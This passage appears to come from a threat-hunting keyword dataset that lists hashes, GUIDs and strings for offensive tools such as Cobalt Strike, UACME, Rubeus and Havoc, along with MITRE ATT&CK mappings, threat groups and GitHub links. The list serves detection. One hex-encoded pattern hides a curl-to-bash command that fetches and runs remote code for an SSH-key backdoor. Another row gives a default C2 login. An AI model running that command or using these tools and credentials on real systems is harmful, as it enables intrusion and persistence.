T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*516280565959*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5439CECD-3BB3-4807-B33F-E4C299B71CA2*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*555AD0AC-1FDB-4016-8257-170A74CB2F55*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like 
commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,0,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z 
-*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*57A893C7-7527-4B55-B4E9-D644BBDA89D1*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate 
backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5A403F3C-9136-4B67-A94E-02D3BCD3162D*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,0,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often 
used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,0,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - 
TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5dec1cfe7c0c2ec55c17fb44b43f7d14*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*5e98194a01c6b48fa582a6a9fcbb92d6*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*5e98194a01c6b48fa582a6a9fcbb92d6*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*5spider:password1234*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*,offensive_tool_keyword,UACME,Defeating Windows User Account Control 
by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*61CE6716-E619-483C-B535-8694F7617548*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*61CE6716-E619-483C-B535-8694F7617548*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,0,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*639EF517-FCFC-408E-9500-71F0DC0458DB*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*-64 -format=reflective-dll *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*6563686f2048656c6c6f204261636b646f6f72*,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*658C8B7F-3664-4A95-9572-A3E5871DFC06*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*66e0681a500c726ed52e5ea9423d2654*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - 